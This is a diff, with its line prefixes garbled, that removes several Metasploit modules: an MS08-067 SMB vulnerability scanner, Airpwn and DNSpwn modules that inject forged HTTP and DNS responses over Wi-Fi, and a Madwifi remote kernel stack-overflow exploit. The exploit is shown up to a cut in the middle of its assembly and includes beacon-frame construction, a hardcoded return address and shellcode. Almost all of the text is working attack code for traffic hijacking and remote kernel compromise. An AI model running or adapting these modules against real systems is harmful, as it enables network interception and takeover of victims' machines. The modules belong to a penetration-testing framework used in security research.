# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
require "msf/core"
|
|
||||||
require 'msf/core/module/deprecated'
|
|
||||||
|
|
||||||
class Metasploit4 < Msf::Auxiliary
|
|
||||||
|
|
||||||
include Msf::Exploit::Remote::DCERPC
|
|
||||||
include Msf::Exploit::Remote::SMB
|
|
||||||
include Msf::Auxiliary::Scanner
|
|
||||||
include Msf::Auxiliary::Report
|
|
||||||
include Msf::Module::Deprecated
|
|
||||||
deprecated Date.new(2014, 2, 26), "exploit/windows/smb/ms08_067_netapi"
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => "MS08-067 Scanner",
|
|
||||||
'Description' => %q{
|
|
||||||
This module uses the check in ms08_067_netapi to scan for MS08-067.
|
|
||||||
},
|
|
||||||
'Author' => [
|
|
||||||
"hdm", # with tons of input/help/testing from the community
|
|
||||||
"Brett Moore <brett.moore[at]insomniasec.com>",
|
|
||||||
"frank2 <frank2@dc949.org>", # check() detection
|
|
||||||
"jduck", # XP SP2/SP3 AlwaysOn DEP bypass
|
|
||||||
"sho-luv", # Original module
|
|
||||||
"wvu" # Refactor and cleanup
|
|
||||||
],
|
|
||||||
'References' => [
|
|
||||||
["CVE", "2008-4250"],
|
|
||||||
["OSVDB", "49243"],
|
|
||||||
["MSB", "MS08-067"],
|
|
||||||
# If this vulnerability is found, ms08-67 is exposed as well
|
|
||||||
["URL", "http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos"]
|
|
||||||
],
|
|
||||||
'License' => MSF_LICENSE
|
|
||||||
))
|
|
||||||
|
|
||||||
register_options([
|
|
||||||
OptString.new("SMBPIPE", [true, "The pipe name to use (BROWSER, SRVSVC)", "BROWSER"])
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def run_host(ip)
|
|
||||||
case check_vuln
|
|
||||||
when Msf::Exploit::CheckCode::Vulnerable
|
|
||||||
print_good("#{ip}:#{rport} - MS08-067 VULNERABLE")
|
|
||||||
report_vuln({
|
|
||||||
:host => ip,
|
|
||||||
:name => "MS08-067",
|
|
||||||
:info => "Vulnerability in Server service could allow remote code execution",
|
|
||||||
:refs => self.references
|
|
||||||
})
|
|
||||||
when Msf::Exploit::CheckCode::Safe
|
|
||||||
vprint_status("#{ip}:#{rport} - MS08-067 SAFE")
|
|
||||||
when Msf::Exploit::CheckCode::Unknown
|
|
||||||
vprint_status("#{ip}:#{rport} - MS08-067 UNKNOWN")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
def check_vuln
|
|
||||||
begin
|
|
||||||
connect()
|
|
||||||
smb_login()
|
|
||||||
rescue Rex::Proto::SMB::Exceptions::LoginError
|
|
||||||
return Msf::Exploit::CheckCode::Unknown
|
|
||||||
end
|
|
||||||
|
|
||||||
#
|
|
||||||
# Build the malicious path name
|
|
||||||
# 5b878ae7 "db @eax;g"
|
|
||||||
prefix = "\\"
|
|
||||||
path =
|
|
||||||
"\x00\\\x00/"*0x10 +
|
|
||||||
Rex::Text.to_unicode("\\") +
|
|
||||||
Rex::Text.to_unicode("R7") +
|
|
||||||
Rex::Text.to_unicode("\\..\\..\\") +
|
|
||||||
Rex::Text.to_unicode("R7") +
|
|
||||||
"\x00"*2
|
|
||||||
|
|
||||||
server = Rex::Text.rand_text_alpha(rand(8)+1).upcase
|
|
||||||
|
|
||||||
handle = dcerpc_handle( '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
|
|
||||||
'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
|
|
||||||
)
|
|
||||||
|
|
||||||
begin
|
|
||||||
# Samba doesn't have this handle and returns an ErrorCode
|
|
||||||
dcerpc_bind(handle)
|
|
||||||
rescue Rex::Proto::SMB::Exceptions::ErrorCode
|
|
||||||
return Msf::Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
|
|
||||||
stub =
|
|
||||||
NDR.uwstring(server) +
|
|
||||||
NDR.UnicodeConformantVaryingStringPreBuilt(path) +
|
|
||||||
NDR.long(8) +
|
|
||||||
NDR.wstring(prefix) +
|
|
||||||
NDR.long(4097) +
|
|
||||||
NDR.long(0)
|
|
||||||
|
|
||||||
resp = dcerpc.call(0x1f, stub)
|
|
||||||
error = resp[4,4].unpack("V")[0]
|
|
||||||
|
|
||||||
# Cleanup
|
|
||||||
simple.client.close
|
|
||||||
simple.client.tree_disconnect
|
|
||||||
disconnect
|
|
||||||
|
|
||||||
if (error == 0x0052005c) # \R :)
|
|
||||||
return Msf::Exploit::CheckCode::Vulnerable
|
|
||||||
else
|
|
||||||
return Msf::Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
|
@ -1,194 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
require 'yaml'
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Auxiliary
|
|
||||||
|
|
||||||
include Msf::Exploit::Capture
|
|
||||||
include Msf::Exploit::Lorcon2
|
|
||||||
include Msf::Auxiliary::Report
|
|
||||||
|
|
||||||
def initialize
|
|
||||||
super(
|
|
||||||
'Name' => 'Airpwn TCP Hijack',
|
|
||||||
'Description' => %q{
|
|
||||||
TCP streams are 'protected' only in so much as the sequence
|
|
||||||
number is not guessable.
|
|
||||||
|
|
||||||
Wifi is shared media.
|
|
||||||
|
|
||||||
Got your nose.
|
|
||||||
|
|
||||||
Responses which do not begin with Header: Value assumed to be
|
|
||||||
HTML only and will have Header:Value data prepended. Responses
|
|
||||||
which do not include a Content-Length header will have one generated.
|
|
||||||
},
|
|
||||||
'Author' => ['toast', 'dragorn', 'ddz', 'hdm'],
|
|
||||||
'License' => MSF_LICENSE,
|
|
||||||
'Actions' =>
|
|
||||||
[
|
|
||||||
[ 'Airpwn' ]
|
|
||||||
],
|
|
||||||
'PassiveActions' =>
|
|
||||||
[
|
|
||||||
'Capture'
|
|
||||||
],
|
|
||||||
'DefaultAction' => 'Airpwn'
|
|
||||||
)
|
|
||||||
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptPath.new('SITELIST', [ false, "YAML file of URL/Replacement pairs for GET replacement",
|
|
||||||
File.join(Msf::Config.data_directory, "exploits", "wifi", "airpwn", "sitelist.yml")
|
|
||||||
]),
|
|
||||||
OptBool.new('USESITEFILE', [ true, "Use site list file for match/response", "false"]),
|
|
||||||
OptString.new('FILTER', [ true, "Default BPF filter", "port 80"]),
|
|
||||||
OptString.new('MATCH', [ true, "Default request match", "GET ([^ ?]+) HTTP" ]),
|
|
||||||
OptString.new('RESPONSE', [ true, "Default response", "Airpwn" ]),
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def run
|
|
||||||
|
|
||||||
@sitelist = datastore['SITELIST']
|
|
||||||
@regex = datastore['MATCH']
|
|
||||||
@response = datastore['RESPONSE']
|
|
||||||
@filter = datastore['FILTER']
|
|
||||||
@useyaml = datastore['USESITEFILE']
|
|
||||||
|
|
||||||
@http = []
|
|
||||||
|
|
||||||
if @useyaml then
|
|
||||||
begin
|
|
||||||
@http = YAML::load_file(@sitelist)
|
|
||||||
|
|
||||||
rescue ::Exception => e
|
|
||||||
print_error "AIRPWN: failed to parse YAML file, #{e.class} #{e} #{e.backtrace}"
|
|
||||||
end
|
|
||||||
else
|
|
||||||
@http[0] = { "regex" => [@regex], "response" => @response }
|
|
||||||
end
|
|
||||||
|
|
||||||
@run = true
|
|
||||||
|
|
||||||
print_status "AIRPWN: Parsing responses and defining headers"
|
|
||||||
|
|
||||||
# Prep the responses
|
|
||||||
@http.each do |r|
|
|
||||||
if not r["response"] then
|
|
||||||
if not r["file"] then
|
|
||||||
print_error "AIRPWN: Missing 'response' or 'file' in yaml config"
|
|
||||||
r["txresponse"] = ""
|
|
||||||
else
|
|
||||||
r["txresponse"] = ""
|
|
||||||
begin
|
|
||||||
File.open(r["file"], "rb") do |io|
|
|
||||||
r["txresponse"] += io.read(4096)
|
|
||||||
end
|
|
||||||
rescue EOFError
|
|
||||||
rescue ::Exception => e
|
|
||||||
print_error("AIRPWN: failed to parse response file " +
|
|
||||||
"#{r['file']}, #{e.class} #{e} #{e.backtrace}")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
else
|
|
||||||
if r["file"] then
|
|
||||||
print_error "AIRPWN: Both 'response' and 'file' in yaml config, " +
|
|
||||||
"defaulting to 'response'"
|
|
||||||
end
|
|
||||||
|
|
||||||
r["txresponse"] = r["response"]
|
|
||||||
end
|
|
||||||
|
|
||||||
# If we have headers
|
|
||||||
if r["txresponse"].scan(/[^:?]+: .+\n/m).size > 0
|
|
||||||
# But not a content-length
|
|
||||||
if r["txresponse"].scan(/^Content-Length: /).size == 0
|
|
||||||
# Figure out the length and add it
|
|
||||||
loc = (/\n\n/m =~ r["txresponse"])
|
|
||||||
if loc == nil
|
|
||||||
print_status "AIRPWN: Response packet looks like HTTP headers but can't find end of headers. Will inject as-is."
|
|
||||||
else
|
|
||||||
print_status "AIRPWN: Response packet looks like HTTP headers but has no Content-Length, adding one."
|
|
||||||
r["txresponse"].insert(loc, "\r\nContent-Length: " + (r["response"].length - loc).to_s)
|
|
||||||
end
|
|
||||||
end
|
|
||||||
else
|
|
||||||
# We have no headers, generate a response
|
|
||||||
print_status "AIRPWN: Response packet has no HTTP headers, creating some."
|
|
||||||
r["txresponse"].insert(0, "HTTP/1.1 200 OK\r\nDate: %s\r\nServer: Apache\r\nConnection: close\r\nContent-Type: text/html\r\nContent-Length: %d\r\n\r\n" % [Time.now, @response.size])
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
print_status "Opening wifi module."
|
|
||||||
open_wifi
|
|
||||||
|
|
||||||
self.wifi.filter = @filter if (@filter != "")
|
|
||||||
each_packet do |pkt|
|
|
||||||
|
|
||||||
d3 = pkt.dot3
|
|
||||||
|
|
||||||
next if not d3
|
|
||||||
p = PacketFu::Packet.parse(d3) rescue nil
|
|
||||||
next unless p.is_tcp?
|
|
||||||
|
|
||||||
@http.each do |r|
|
|
||||||
hit = nil
|
|
||||||
r['regex'].each do |reg|
|
|
||||||
hit = p.payload.scan(/#{reg}/) || nil
|
|
||||||
break if hit.size != 0
|
|
||||||
end
|
|
||||||
next if hit.size.zero?
|
|
||||||
|
|
||||||
print_status("AIRPWN: %s -> %s HTTP GET [%s] TCP SEQ %u" % [p.ip_saddr, p.ip_daddr, $1, p.tcp_seq])
|
|
||||||
|
|
||||||
injpkt = Lorcon::Packet.new()
|
|
||||||
injpkt.bssid = pkt.bssid
|
|
||||||
|
|
||||||
response_pkt = PacketFu::TCPPacket.new
|
|
||||||
response_pkt.eth_daddr = p.eth_saddr
|
|
||||||
response_pkt.eth_saddr = p.eth_daddr
|
|
||||||
response_pkt.ip_saddr = p.ip_daddr
|
|
||||||
response_pkt.ip_daddr = p.ip_saddr
|
|
||||||
response_pkt.ip_ttl = p.ip_ttl
|
|
||||||
response_pkt.tcp_sport = p.tcp_dport
|
|
||||||
response_pkt.tcp_dport = p.tcp_sport
|
|
||||||
response_pkt.tcp_win = p.tcp_win
|
|
||||||
response_pkt.tcp_seq = p.tcp_ack
|
|
||||||
response_pkt.tcp_ack = (p.tcp_seq + p.ip_header.body.to_s.size - (p.tcp_hlen * 4)) & 0xffffffff
|
|
||||||
response_pkt.tcp_flags.ack = 1
|
|
||||||
response_pkt.tcp_flags.psh = 1
|
|
||||||
response_pkt.payload = r["txresponse"]
|
|
||||||
response_pkt.recalc
|
|
||||||
injpkt.dot3 = response_pkt.to_s
|
|
||||||
|
|
||||||
case pkt.direction
|
|
||||||
when ::Lorcon::Packet::LORCON_FROM_DS
|
|
||||||
injpkt.direction = Lorcon::Packet::LORCON_TO_DS
|
|
||||||
when ::Lorcon::Packet::LORCON_TO_DS
|
|
||||||
injpkt.direction = Lorcon::Packet::LORCON_FROM_DS
|
|
||||||
else
|
|
||||||
injpkt.direction = Lorcon::Packet::LORCON_ADHOC_DS
|
|
||||||
end
|
|
||||||
|
|
||||||
self.wifi.inject(injpkt) or print_error("AIRPWN failed to inject packet: " + tx.error)
|
|
||||||
|
|
||||||
response_pkt.tcp_seq = response_pkt.tcp_seq + response_pkt.payload.size
|
|
||||||
response_pkt.tcp_flags.ack = 1
|
|
||||||
response_pkt.tcp_flags.psh = 0
|
|
||||||
response_pkt.tcp_flags.fin = 1
|
|
||||||
response_pkt.payload = 0
|
|
||||||
response_pkt.recalc
|
|
||||||
|
|
||||||
injpkt.dot3 = response_pkt.to_s
|
|
||||||
self.wifi.inject(injpkt) or print_error("AIRPWN failed to inject packet: " + tx.error)
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
|
@ -1,120 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
require 'yaml'
|
|
||||||
require 'net/dns/packet'
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Auxiliary
|
|
||||||
|
|
||||||
include Msf::Exploit::Capture
|
|
||||||
include Msf::Exploit::Lorcon2
|
|
||||||
include Msf::Auxiliary::Report
|
|
||||||
|
|
||||||
def initialize
|
|
||||||
super(
|
|
||||||
'Name' => 'DNSpwn DNS Hijack',
|
|
||||||
'Description' => %q{
|
|
||||||
Race DNS responses and replace DNS queries
|
|
||||||
},
|
|
||||||
'Author' => ['dragorn'],
|
|
||||||
'License' => MSF_LICENSE
|
|
||||||
)
|
|
||||||
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptPath.new('DNSLIST', [ false, "YAML file of DNS entries for replacement",
|
|
||||||
File.join(Msf::Config.data_directory, "exploits", "wifi", "dnspwn", "dnslist.yml")
|
|
||||||
]),
|
|
||||||
OptBool.new('USEDNSFILE', [ true, "Use dns list file for response", "false"]),
|
|
||||||
OptString.new('FILTER', [ true, "Default BPF filter", "port 53"]),
|
|
||||||
OptString.new('IP', [ true, "IP for host resolution", "1.2.3.4" ]),
|
|
||||||
OptString.new('DURATION', [ true, "Duration of spoofed IP record", "99999" ]),
|
|
||||||
OptString.new('MATCH', [ true, "Match for DNS name replacement", "(.*)"]),
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def run
|
|
||||||
|
|
||||||
@dnslist = datastore['DNSLIST']
|
|
||||||
@regex = datastore['MATCH']
|
|
||||||
@response = datastore['IP']
|
|
||||||
@filter = datastore['FILTER']
|
|
||||||
@duration = datastore['DURATION']
|
|
||||||
@useyaml = datastore['USEDNSFILE']
|
|
||||||
|
|
||||||
@dns = []
|
|
||||||
|
|
||||||
if @useyaml
|
|
||||||
begin
|
|
||||||
@dns = YAML::load_file(@dnslist)
|
|
||||||
rescue ::Exception => e
|
|
||||||
print_error "DNSPWN: failed to parse YAML file, #{e.class} #{e} #{e.backtrace}"
|
|
||||||
end
|
|
||||||
else
|
|
||||||
@dns[0] = { "regex" => @regex, "response" => @response, "duration" => @duration }
|
|
||||||
end
|
|
||||||
|
|
||||||
@run = true
|
|
||||||
|
|
||||||
open_wifi
|
|
||||||
|
|
||||||
self.wifi.filter = @filter if not @filter.empty?
|
|
||||||
each_packet do |pkt|
|
|
||||||
d3 = pkt.dot3
|
|
||||||
|
|
||||||
next if not d3
|
|
||||||
p = PacketFu::Packet.parse(d3) rescue nil
|
|
||||||
next unless p.is_udp?
|
|
||||||
|
|
||||||
dns = Net::DNS::Packet::parse(p.payload) rescue nil
|
|
||||||
next unless dns
|
|
||||||
|
|
||||||
next if dns.answer.size != 0
|
|
||||||
next if dns.question.size == 0
|
|
||||||
|
|
||||||
@dns.each do |r|
|
|
||||||
hit = nil
|
|
||||||
r['regex'].each do |reg|
|
|
||||||
hit = dns.question[0].qName.scan(/#{reg}/) || nil
|
|
||||||
break if hit.size != 0
|
|
||||||
end
|
|
||||||
next if hit.size.zero?
|
|
||||||
|
|
||||||
print_status("DNSPWN: %s -> %s req %s transaction id %u (response %s)" % [p.ip_saddr, p.ip_daddr, dns.header.id, r["response"] ])
|
|
||||||
|
|
||||||
injpkt = Lorcon::Packet.new()
|
|
||||||
injpkt.bssid = pkt.bssid
|
|
||||||
|
|
||||||
response_pkt = PacketFu::UDPPacket.new
|
|
||||||
response_pkt.eth_daddr = p.eth_saddr
|
|
||||||
response_pkt.eth_saddr = p.eth_daddr
|
|
||||||
response_pkt.ip_saddr = p.ip_daddr
|
|
||||||
response_pkt.ip_daddr = p.ip_saddr
|
|
||||||
response_pkt.ip_ttl = p.ip_ttl
|
|
||||||
response_pkt.udp_sport = p.udp_dport
|
|
||||||
response_pkt.udp_dport = p.udp_sport
|
|
||||||
|
|
||||||
dns.header.qr = 1
|
|
||||||
dns.answer = Net::DNS::RR::A.new("%s %s IN A %s", dns.question[0].qName, r["duration"], r["response"])
|
|
||||||
|
|
||||||
response_pkt.payload = dns.data
|
|
||||||
response_pkt.recalc
|
|
||||||
|
|
||||||
injpkt.dot3 = response_pkt.to_s
|
|
||||||
|
|
||||||
if (pkt.direction == Lorcon::Packet::LORCON_FROM_DS)
|
|
||||||
injpkt.direction = Lorcon::Packet::LORCON_TO_DS
|
|
||||||
elsif (pkt.direction == Lorcon::Packet::LORCON_TO_DS)
|
|
||||||
injpkt.direction = Lorcon::Packet::LORCON_FROM_DS
|
|
||||||
else
|
|
||||||
injpkt.direction = Lorcon::Packet::LORCON_ADHOC_DS
|
|
||||||
end
|
|
||||||
|
|
||||||
self.wifi.inject(injpkt) or print_error("DNSPWN failed to inject packet: " + tx.error)
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
||||||
end
|
|
|
@ -1,378 +0,0 @@
|
||||||
##
|
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
|
||||||
##
|
|
||||||
|
|
||||||
# Madwifi remote kernel exploit
|
|
||||||
# 100% reliable, doesn't crash wifi stack, can exploit
|
|
||||||
# same target multiple times
|
|
||||||
#
|
|
||||||
# Julien TINNES <julien at cr0.org>
|
|
||||||
# Laurent BUTTI <0x9090 at gmail.com>
|
|
||||||
#
|
|
||||||
# vuln in giwscan_cb, here's the path:
|
|
||||||
#
|
|
||||||
# ieee80211_ioctl_giwscan -> ieee80211_scan_iterate -> sta_iterate -> giwscan_cb
|
|
||||||
#
|
|
||||||
|
|
||||||
require 'msf/core'
|
|
||||||
require 'metasm'
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
|
||||||
Rank = AverageRanking
|
|
||||||
|
|
||||||
include Msf::Exploit::Lorcon2
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'Madwifi SIOCGIWSCAN Buffer Overflow',
|
|
||||||
'Description' => %q{
|
|
||||||
The Madwifi driver under Linux is vulnerable to a remote kernel-mode
|
|
||||||
stack-based buffer overflow.
|
|
||||||
|
|
||||||
The vulnerability is triggered by one of these properly crafted
|
|
||||||
information element: WPA, RSN, WME and Atheros OUI Current madwifi
|
|
||||||
driver (0.9.2) and and all madwifi-ng drivers since r1504 are
|
|
||||||
vulnerable
|
|
||||||
|
|
||||||
Madwifi 0.9.2.1 release corrects the issue.
|
|
||||||
|
|
||||||
This module has been tested against Ubuntu 6.10 and is 100% reliable,
|
|
||||||
doesn\'t crash the Wifi stack and can exploit the same machine multiple
|
|
||||||
time without the need to reboot it.
|
|
||||||
|
|
||||||
This module depends on the Lorcon2 library and only works on the Linux
|
|
||||||
platform with a supported wireless card. Please see the Ruby Lorcon2
|
|
||||||
documentation (external/ruby-lorcon/README) for more information.
|
|
||||||
},
|
|
||||||
'Author' =>
|
|
||||||
[
|
|
||||||
'Julien Tinnes <julien at cr0.org>',
|
|
||||||
'Laurent Butti <0x9090 at gmail.com>'
|
|
||||||
],
|
|
||||||
'License' => MSF_LICENSE,
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
['CVE', '2006-6332'],
|
|
||||||
['OSVDB', '31267'],
|
|
||||||
['URL', 'http://www.madwifi.org']
|
|
||||||
],
|
|
||||||
#'Stance' => Msf::Exploit::Stance::Passive,
|
|
||||||
'Platform' => 'linux',
|
|
||||||
'Arch' => [ ARCH_X86 ],
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
#'Space' => 65,
|
|
||||||
# Metasploit doesn't support dynamic size payloads
|
|
||||||
# so we will handle this in metasm instead and ask for
|
|
||||||
# the smaller payload possible
|
|
||||||
#'Encoder' => Msf::Encoder::Type::Raw,
|
|
||||||
'DisableNops' => true
|
|
||||||
},
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
[ 'Ubuntu 6.10',
|
|
||||||
{
|
|
||||||
'JMPESP' => 0xffffe777,
|
|
||||||
'scan_iterate_ra' => "0x8014401"
|
|
||||||
}
|
|
||||||
],
|
|
||||||
|
|
||||||
[ 'Generic (you need non randomized vdso)',
|
|
||||||
{
|
|
||||||
'JMPESP' => 0xffffe777,
|
|
||||||
'scan_iterate_ra' => nil
|
|
||||||
}
|
|
||||||
]
|
|
||||||
],
|
|
||||||
'DisclosureDate' => 'Dec 08 2006'
|
|
||||||
))
|
|
||||||
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptBool.new('SINGLESHOT', [ true, "Break after first victim (for msfcli)", 'false']),
|
|
||||||
OptString.new('SSID', [ true, "The SSID of the emulated access point", 'test']),
|
|
||||||
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 600]),
|
|
||||||
OptInt.new('LENGTH', [ true, "Length after local variables in giwscan_cb() to overwrite", 24]),
|
|
||||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF']),
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit
|
|
||||||
open_wifi
|
|
||||||
|
|
||||||
#puts "kikoo " + payload.encoded.inspect
|
|
||||||
#puts payload.encoded.to_s.unpack('C*').map { |i| i.to_s 16 }.join(',')
|
|
||||||
|
|
||||||
stime = Time.now.to_i
|
|
||||||
rtime = datastore['RUNTIME'].to_i
|
|
||||||
count = 0
|
|
||||||
|
|
||||||
print_status("Shellcode size is: #{payload.encoded.length} bytes")
|
|
||||||
print_status("Creating malicious beacon frame...")
|
|
||||||
|
|
||||||
frame = create_beacon()
|
|
||||||
|
|
||||||
print_status("Sending malicious beacon frames for #{datastore['RUNTIME']} seconds...")
|
|
||||||
|
|
||||||
while (stime + rtime > Time.now.to_i)
|
|
||||||
wifi.write(frame)
|
|
||||||
select(nil, nil, nil, 0.10) if (count % 100 == 0)
|
|
||||||
count += 1
|
|
||||||
break if session_created? and datastore['SINGLESHOT']
|
|
||||||
end
|
|
||||||
|
|
||||||
print_status("Completed sending #{count} beacons.")
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
def create_beacon
|
|
||||||
|
|
||||||
ssid = datastore['SSID'].to_s
|
|
||||||
bssid = Rex::Text.rand_text(6)
|
|
||||||
channel = datastore['CHANNEL'].to_i
|
|
||||||
len = datastore['LENGTH'].to_i
|
|
||||||
seq = [rand(255)].pack('n')
|
|
||||||
jmpesp = target['JMPESP'] # jmp esp in vdso
|
|
||||||
|
|
||||||
# address just after the call (in ieee80211_scan_iterate in wlan.ko)
|
|
||||||
scan_iterate_ra=target['scan_iterate_ra']
|
|
||||||
|
|
||||||
if scan_iterate_ra
|
|
||||||
howtoreturn = "RETURN_PROPERLY" # Return to the parent of giwscan_cb parent
|
|
||||||
else
|
|
||||||
howtoreturn = "RETURN_BADLY" # Return to userland with IRET
|
|
||||||
end
|
|
||||||
|
|
||||||
bssiwlist = 0x0804ddd0
|
|
||||||
|
|
||||||
stacksize = "STACK_8K"
|
|
||||||
getregs = "CALCULATE"
|
|
||||||
#getregs = "IWANTTOSCANMANUALLY"
|
|
||||||
reg_cs = "0x73"
|
|
||||||
reg_ss = "0x7b"
|
|
||||||
|
|
||||||
wiframe = Metasm::Shellcode.assemble Metasm::Ia32.new, <<EOS
|
|
||||||
#define #{stacksize} 1
|
|
||||||
#define #{getregs} 1
|
|
||||||
#define CS #{reg_cs}
|
|
||||||
#define SS #{reg_ss}
|
|
||||||
#define #{howtoreturn} 1
|
|
||||||
|
|
||||||
; chunk1
|
|
||||||
db 0, 0x50, 0xf2 ; wpa_oui
|
|
||||||
db 1 ; wpa_typ
|
|
||||||
db 1, 0 ; wpa_ver
|
|
||||||
|
|
||||||
back2:
|
|
||||||
;push 0x1C
|
|
||||||
;ret
|
|
||||||
|
|
||||||
;cld
|
|
||||||
|
|
||||||
#ifdef RETURN_PROPERLY
|
|
||||||
mov ebx, esp ; save esp
|
|
||||||
#endif
|
|
||||||
|
|
||||||
#ifdef IWANTTOSCANMANUALLY
|
|
||||||
mov eax, 4
|
|
||||||
checkforcs:
|
|
||||||
add esp, eax
|
|
||||||
cmp dword ptr [esp], 0x73 ; scan for cs
|
|
||||||
jnz checkforcs
|
|
||||||
|
|
||||||
cmp dword ptr [esp+12], 0x7b ; scan for ss
|
|
||||||
jnz checkforcs
|
|
||||||
|
|
||||||
mov edi, dword ptr [esp+8] ; put user stack address in edi
|
|
||||||
push edi
|
|
||||||
|
|
||||||
; NO SCAN, calculate the good value
|
|
||||||
#else
|
|
||||||
|
|
||||||
|
|
||||||
#ifdef STACK_8K
|
|
||||||
or esp, (0x2000-1) ; assume 8K stack
|
|
||||||
#else
|
|
||||||
or esp, (0x1000-1) ; assume 4K stack
|
|
||||||
#endif
|
|
||||||
|
|
||||||
sub esp, 0x17 ; cf return_from_syscall
|
|
||||||
mov edi, dword ptr [esp+8]
|
|
||||||
push edi
|
|
||||||
|
|
||||||
; IWANTTOSCANMANUALLY
|
|
||||||
#endif
|
|
||||||
|
|
||||||
; We can also go to BSS instead of stack
|
|
||||||
;mov edi, #{bssiwlist}
|
|
||||||
;push edi
|
|
||||||
|
|
||||||
call endsc
|
|
||||||
|
|
||||||
beginsc:
|
|
||||||
#if 0
|
|
||||||
call greetings
|
|
||||||
toto db "You're pwn3d :(\\n"
|
|
||||||
greetings:
|
|
||||||
mov eax, 4
|
|
||||||
mov ebx, 1
|
|
||||||
pop ecx
|
|
||||||
mov edx, (greetings - toto)
|
|
||||||
int 0x80
|
|
||||||
#endif
|
|
||||||
|
|
||||||
xor eax, eax
|
|
||||||
inc eax
|
|
||||||
inc eax
|
|
||||||
int 0x80 ; fork
|
|
||||||
cmp eax, 0
|
|
||||||
jnz doexit
|
|
||||||
|
|
||||||
;#include "/home/julien/Audit/metasploit3/modules/exploits/linux/madwifi/connectback.asm"
|
|
||||||
|
|
||||||
;; Metasploit's shellcode integration
|
|
||||||
; Old, bad method
|
|
||||||
;metasc db "#{payload.encoded.unpack('C*').map { |i| '\\x%02x' % i }.join}"
|
|
||||||
|
|
||||||
; this will be replaced by metasploit's payload
|
|
||||||
metasc:
|
|
||||||
; metasm will add padding here so that the next .offset is honored
|
|
||||||
.pad db 0x33
|
|
||||||
metascend:
|
|
||||||
|
|
||||||
doexit:
|
|
||||||
#if 1
|
|
||||||
; exit
|
|
||||||
xor eax, eax
|
|
||||||
inc eax
|
|
||||||
;mov ebx, 42
|
|
||||||
int 0x80
|
|
||||||
#endif
|
|
||||||
endsc:
|
|
||||||
|
|
||||||
pop esi
|
|
||||||
; let's copy the shellcode to userland
|
|
||||||
mov ecx, endsc - beginsc
|
|
||||||
rep movsb
|
|
||||||
|
|
||||||
#ifdef RETURN_PROPERLY
|
|
||||||
mov esp, ebx ; restore stack pointer
|
|
||||||
|
|
||||||
; If SCANFOR_SCAN_ITERATE defined
|
|
||||||
; scan for ieee80211_scan_iterate
|
|
||||||
; example address: e0b46401 (scan_iterate+0x11)
|
|
||||||
; It should be easier to use this if porting the exploit in a hurry
|
|
||||||
;#define SCANFOR_SCAN_ITERATE
|
|
||||||
|
|
||||||
#ifdef SCANFOR_SCAN_ITERATE
|
|
||||||
sub esp, 4 ; you can remove this in most cases
|
|
||||||
checkforretadd:
|
|
||||||
add esp, 4
|
|
||||||
mov ebx, dword ptr [esp+16] ; scan for return address, we know that we have
|
|
||||||
; four saved register before the return address
|
|
||||||
; (+16)
|
|
||||||
and ebx, 0x07FF
|
|
||||||
cmp ebx, #{scan_iterate_ra} & 0x07FF
|
|
||||||
jnz checkforretadd
|
|
||||||
|
|
||||||
;mov ebp, edi ; fixup EBP (cf end of ieee80211_ioctl_giwscan which will use it)
|
|
||||||
; we need a writeable address
|
|
||||||
|
|
||||||
#endif
|
|
||||||
; Here we know the stack layout and esp already has the correct value
|
|
||||||
|
|
||||||
pop ebx ; Well, no need to fixup EBP, just run
|
|
||||||
; sta_iterate epilogue, thanks Staphane Duverger,
|
|
||||||
; how could I miss that!
|
|
||||||
pop esi
|
|
||||||
pop edi
|
|
||||||
pop ebp
|
|
||||||
|
|
||||||
; release the locks
|
|
||||||
push esi ; save esi
|
|
||||||
mov eax, edi ; we use the fact that edi has the same value in ieee80211_ioctl_giwscan
|
|
||||||
; just before the call to i*_scan_iterate and in sta_iterate just before
|
|
||||||
; the ret
|
|
||||||
mov eax, [eax+0x978] ; cf. i*_scan_iterate
|
|
||||||
mov esi, [eax+8] ; cf. sta_iterate
|
|
||||||
|
|
||||||
xor eax, eax
|
|
